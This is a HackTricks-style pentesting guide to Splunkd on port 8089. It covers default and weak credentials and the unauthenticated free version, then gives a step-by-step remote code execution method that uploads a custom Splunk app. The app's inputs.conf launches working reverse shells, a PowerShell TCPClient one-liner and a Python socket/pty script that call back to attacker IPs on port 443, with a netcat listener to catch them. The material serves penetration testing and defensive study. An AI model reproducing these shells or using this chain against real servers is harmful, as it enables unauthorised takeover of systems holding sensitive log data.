8089 - Pentesting Splunkd

Learn & practice AWS Hacking: Learn & practice GCP Hacking:

Support HackTricks

Check the !
Join the 💬 or the or follow us on Twitter 🐦 .
Share hacking tricks by submitting PRs to the and github repos.

Basic Information

Splunk is a log analytics tool that plays a crucial role in gathering, analyzing, and visualizing data. While its initial purpose was not to serve as a SIEM (Security Information and Event Management) tool, it has gained popularity in the realm of security monitoring and business analytics.

Splunk deployments are frequently utilized to store sensitive data and can serve as a valuable source of information for potential attackers if they manage to compromise the system. Default port: 8089

PORT     STATE SERVICE VERSION
8089/tcp open  http    Splunkd httpd

The Splunk web server runs by default on port 8000.

Enumeration

Free Version

The Splunk Enterprise trial converts to a free version after 60 days, which doesn’t require authentication. It is not uncommon for system administrators to install a trial of Splunk to test it out, which is subsequently forgotten about. This will automatically convert to the free version that does not have any form of authentication, introducing a security hole in the environment. Some organizations may opt for the free version due to budget constraints, not fully understanding the implications of having no user/role management.

Default Credentials

On older versions of Splunk, the default credentials are admin:changeme, which are conveniently displayed on the login page. However, the latest version of Splunk sets credentials during the installation process. If the default credentials do not work, it is worth checking for common weak passwords such as admin, Welcome, Welcome1, Password123, etc.

Obtain Information

Once logged in to Splunk, we can browse data, run reports, create dashboards, install applications from the Splunkbase library, and install custom applications. You can also run code: Splunk has multiple ways of running code, such as server-side Django applications, REST endpoints, scripted inputs, and alerting scripts. A common method of gaining remote code execution on a Splunk server is through the use of a scripted input.

Moreover, as Splunk can be installed on Windows or Linux hosts, scripted inputs can be created to run Bash, PowerShell, or Batch scripts.

Shodan

Splunk build

RCE

Create Custom Application

A custom application can run Python, Batch, Bash, or PowerShell scripts. Note that Splunk comes with Python installed, so even in Windows systems you will be able to run python code.

To achieve this, we first need to create a custom Splunk application using the following directory structure:

tree splunk_shell/

splunk_shell/
├── bin
└── default

The bin directory will contain any scripts that we intend to run (in this case, a PowerShell reverse shell), and the default directory will have our inputs.conf file. Our reverse shell will be a PowerShell one-liner:

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(

cat inputs.conf 

[script://./bin/rev.py]
disabled = 0  
interval = 10  
sourcetype = shell 

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10

We need the .bat file, which will run when the application is deployed and execute the PowerShell one-liner.

The next step is to choose Install app from file and upload the application.

sudo nc -lnvp 443

listening on [any] 443 ...

On the Upload app page, click on browse, choose the tarball we created earlier and click Upload. As soon as we upload the application, a reverse shell is received as the status of the application will automatically be switched to Enabled.

Linux

If we were dealing with a Linux host, we would need to edit the rev.py Python script before creating the tarball and uploading the custom malicious app. The rest of the process would be the same, and we would get a reverse shell connection on our Netcat listener and be off to the races.

import sys,socket,os,pty

ip="10.10.14.15"
port="443"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')

RCE & Privilege Escalation

In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence:

References

Support HackTricks

Previous8086 - Pentesting InfluxDB Next8333,18333,38333,18444 - Pentesting Bitcoin

Last updated 7 months ago